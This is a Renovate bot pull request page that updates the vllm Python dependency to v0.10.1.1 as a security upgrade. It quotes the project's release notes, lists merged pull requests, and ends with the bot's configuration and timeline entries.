OpenAI API compatibility: Unix domain socket support for local communication (#18097), improved error response format matching upstream specification (#22099), aligned tool_choice="required" behavior with OpenAI when tools list is empty (#21052).
New API capabilities: Dedicated LLM.reward interface for reward models (#21720), chunked processing for long inputs in embedding models (#22280), AsyncLLM proper response handling for aborted requests (#22283).
Configuration and environment: Multiple API keys support for enhanced authentication (#18548), custom vLLM tuned configuration paths (#22791), environment variable control for logging statistics (#22905), multimodal cache size (#22441), and DeepGEMM E8M0 scaling behavior (#21968).
CLI and tooling improvements: V1 API support for run-batch command (#21541), custom process naming for better monitoring (#21445), improved help display showing available choices (#21760), optional memory profiling skip for multimodal models (#22950), enhanced logging of non-default arguments (#21680).
Tool and parser support: HermesToolParser for models without special tokens (#16890), multi-turn conversation benchmarking tool (#20267).
Distributed serving enhancements: Enhanced hybrid distributed serving with multiple API servers in load balancing mode (#21510), request_id support for external load balancers (#21009).
User experience enhancements: Improved error messaging for multimodal items (#22114), per-request pooling control via PoolingParams (#20538).

Dependencies

FlashInfer updates: Updated to v0.2.8 for improved performance (#21385), moved to optional dependency install with pip install vllm[flashinfer] for flexible installation (#21959).
Mamba SSM restructuring: Updated to version 2.2.5 (#21421), removed from core requirements to reduce installation complexity (#22541).
Docker and deployment: Docker-aware precompiled wheel support for easier containerized deployment (#21127, #22106).
Python package updates: OpenAI Python dependency updated to latest version for API compatibility (#22316).
Dependency optimizations: Removed xformers requirement for Mistral-format Pixtral and Mistral3 models (#21154), deprecation warnings added for old DeepGEMM version (#22194).

V0 Deprecation

Important: As part of the ongoing V0 engine cleanup, several breaking changes have been introduced:

CLI flag updates: Replaced --task with --runner and --convert options (#21470), deprecated --disable-log-requests in favor of --enable-log-requests for clearer semantics (#21739), renamed --expand-tools-even-if-tool-choice-none to --exclude-tools-when-tool-choice-none for consistency (#20544).
API cleanup: Removed previously deprecated arguments and methods as part of ongoing V0 engine codebase cleanup (#21907).

What's Changed

Deduplicate Transformers backend code using inheritance by @hmellor in https://github.com/vllm-project/vllm/pull/21461
[Bugfix][ROCm] Fix for warp_size uses on host by @gshtras in https://github.com/vllm-project/vllm/pull/21205
[TPU][Bugfix] fix moe layer by @yaochengji in https://github.com/vllm-project/vllm/pull/21340
[v1][Core] Clean up usages of SpecializedManager by @zhouwfang in https://github.com/vllm-project/vllm/pull/21407
[Misc] Fix duplicate FusedMoEConfig debug messages by @njhill in https://github.com/vllm-project/vllm/pull/21455
[Core] Support model loader plugins by @22quinn in https://github.com/vllm-project/vllm/pull/21067
remove GLM-4 quantization wrong Code by @zRzRzRzRzRzRzR in https://github.com/vllm-project/vllm/pull/21435
Replace --expand-tools-even-if-tool-choice-none with --exclude-tools-when-tool-choice-none for v0.10.0 by @okdshin in https://github.com/vllm-project/vllm/pull/20544
[Misc] Improve comment for DPEngineCoreActor._set_cuda_visible_devices() by @ruisearch42 in https://github.com/vllm-project/vllm/pull/21501
[Feat] Allow custom naming of vLLM processes by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/21445
bump flashinfer to v0.2.8 by @cjackal in https://github.com/vllm-project/vllm/pull/21385
[Attention] Optimize FlashInfer MetadataBuilder Build call by @LucasWilkinson in https://github.com/vllm-project/vllm/pull/21137
[Model] Officially support Emu3 with Transformers backend by @hmellor in https://github.com/vllm-project/vllm/pull/21319
[Bugfix] Fix CUDA arch flags for MoE permute by @minosfuture in https://github.com/vllm-project/vllm/pull/21426
[Fix] Update mamba_ssm to 2.2.5 by @elvischenv in https://github.com/vllm-project/vllm/pull/21421
[Docs] Update Tensorizer usage documentation by @sangstar in https://github.com/vllm-project/vllm/pull/21190
[Docs] Rewrite Distributed Inference and Serving guide by @crypdick in https://github.com/vllm-project/vllm/pull/20593
[Bug] Fix Compressed Tensor NVFP4 cutlass_fp4_group_mm illegal memory access by @yewentao256 in https://github.com/vllm-project/vllm/pull/21465
Update flashinfer CUTLASS MoE Kernel by @wenscarl in https://github.com/vllm-project/vllm/pull/21408
[XPU] Conditionally import CUDA-specific passes to avoid import errors on xpu platform by @chaojun-zhang in https://github.com/vllm-project/vllm/pull/21036
[P/D] Move FakeNixlWrapper to test dir by @ruisearch42 in https://github.com/vllm-project/vllm/pull/21328
[P/D] Support CPU Transfer in NixlConnector by @juncgu in https://github.com/vllm-project/vllm/pull/18293
[Docs][minor] Fix broken gh-file link in distributed serving docs by @crypdick in https://github.com/vllm-project/vllm/pull/21543
[Docs] Add Expert Parallelism Initial Documentation by @simon-mo in https://github.com/vllm-project/vllm/pull/21373
update flashinfer to v0.2.9rc1 by @weireweire in https://github.com/vllm-project/vllm/pull/21485
[TPU][TEST] HF_HUB_DISABLE_XET=1 the test 3. by @QiliangCui in https://github.com/vllm-project/vllm/pull/21539
[MoE] More balanced expert sharding by @WoosukKwon in https://github.com/vllm-project/vllm/pull/21497
[Frontend] run-batch supports V1 by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/21541
[Docs] Fix site_url for RunLLM by @hmellor in https://github.com/vllm-project/vllm/pull/21564
[Bug] Fix DeepGemm Init Error by @yewentao256 in https://github.com/vllm-project/vllm/pull/21554
Fix GLM-4 PP Missing Layer When using with PP. by @zRzRzRzRzRzRzR in https://github.com/vllm-project/vllm/pull/21531
[Kernel] adding fused_moe configs for upcoming granite4 by @bringlein in https://github.com/vllm-project/vllm/pull/21332
[Bugfix] DeepGemm utils : Fix hardcoded type-cast by @varun-sundar-rabindranath in https://github.com/vllm-project/vllm/pull/21517
[DP] Support api-server-count > 0 in hybrid DP LB mode by @njhill in https://github.com/vllm-project/vllm/pull/21510
[TPU][Test] Temporarily suspend this MoE model in test_basic.py. by @QiliangCui in https://github.com/vllm-project/vllm/pull/21560
[Docs] Add requirements/common.txt to run unit tests by @zhouwfang in https://github.com/vllm-project/vllm/pull/21572
Integrate TensorSchema with shape validation for Phi3VImagePixelInputs by @bbeckca in https://github.com/vllm-project/vllm/pull/21232
[CI] Update CODEOWNERS for CPU and Intel GPU by @bigPYJ1151 in https://github.com/vllm-project/vllm/pull/21582
[Bugfix] fix modelscope snapshot_download serialization by @andyxning in https://github.com/vllm-project/vllm/pull/21536
[Model] Support tensor parallel for timm ViT in Deepseek_vl2 by @wzqd in https://github.com/vllm-project/vllm/pull/21494
[Model] Fix a check for None but the return value was empty list in Gemma3 MM vision_embeddings by @hfan in https://github.com/vllm-project/vllm/pull/21479
[Misc][Tools] make max-model-len a parameter in auto_tune script by @yaochengji in https://github.com/vllm-project/vllm/pull/21321
[CI/Build] fix cpu_extension for apple silicon by @ignaciosica in https://github.com/vllm-project/vllm/pull/21195
[Misc] Removed undefined cmake variables MOE_PERMUTE_ARCHS by @chenyang78 in https://github.com/vllm-project/vllm/pull/21262
[TPU][Bugfix] fix OOM issue in CI test by @yaochengji in https://github.com/vllm-project/vllm/pull/21550
[Tests] Harden DP tests by @njhill in https://github.com/vllm-project/vllm/pull/21508
Add H20-3e fused MoE kernel tuning configs for Qwen3-Coder-480B-A35B-Instruct by @Xu-Wenqing in https://github.com/vllm-project/vllm/pull/21598
[Bugfix] GGUF: fix AttributeError: 'PosixPath' object has no attribute 'startswith' by @kebe7jun in https://github.com/vllm-project/vllm/pull/21579
[Quantization] Enable BNB support for more MoE models by @jeejeelee in https://github.com/vllm-project/vllm/pull/21370
[V1] Get supported tasks from model runner instead of model config by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/21585
[Bugfix][Logprobs] Fix logprobs op to support more backend by @MengqingCao in https://github.com/vllm-project/vllm/pull/21591
[Model] Fix Ernie4.5MoE e_score_correction_bias parameter by @xyxinyang in https://github.com/vllm-project/vllm/pull/21586
[MODEL] New model support for naver-hyperclovax/HyperCLOVAX-SEED-Vision-Instruct-3B by @bigshanedogg in https://github.com/vllm-project/vllm/pull/20931
[Frontend] Add request_id to the Request object so they can be controlled better via external load balancers by @kouroshHakha in https://github.com/vllm-project/vllm/pull/21009
[Model] Replace Mamba2 RMSNorm Gated with Fused Triton Kernel by @cyang49 in https://github.com/vllm-project/vllm/pull/20839
[ROCm][AITER] Enable fp8 kv cache on rocm aiter backend. by @fsx950223 in https://github.com/vllm-project/vllm/pull/20295
[Kernel] Improve machete memory bound perf by @czhu-cohere in https://github.com/vllm-project/vllm/pull/21556
Add support for Prithvi in Online serving mode by @mgazz in https://github.com/vllm-project/vllm/pull/21518
[CI] Unifying Dockerfiles for ARM and X86 Builds by @kebe7jun in https://github.com/vllm-project/vllm/pull/21343
[Docs] add auto-round quantization readme by @wenhuach21 in https://github.com/vllm-project/vllm/pull/21600
[TPU][Test] Rollback PR-21550. by @QiliangCui in https://github.com/vllm-project/vllm/pull/21619

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate bot mentioned this pull request Jun 17, 2025

Update dependency openai to v1.106.1 #6

Open

1 task

Update dependency vllm to v0.10.1.1 [SECURITY]

a8e0894

renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from dfe9935 to a8e0894 Compare August 21, 2025 19:05

renovate bot changed the title ~~Update dependency vllm to v0.9.0 [SECURITY]~~ Update dependency vllm to v0.10.1.1 [SECURITY] Aug 21, 2025

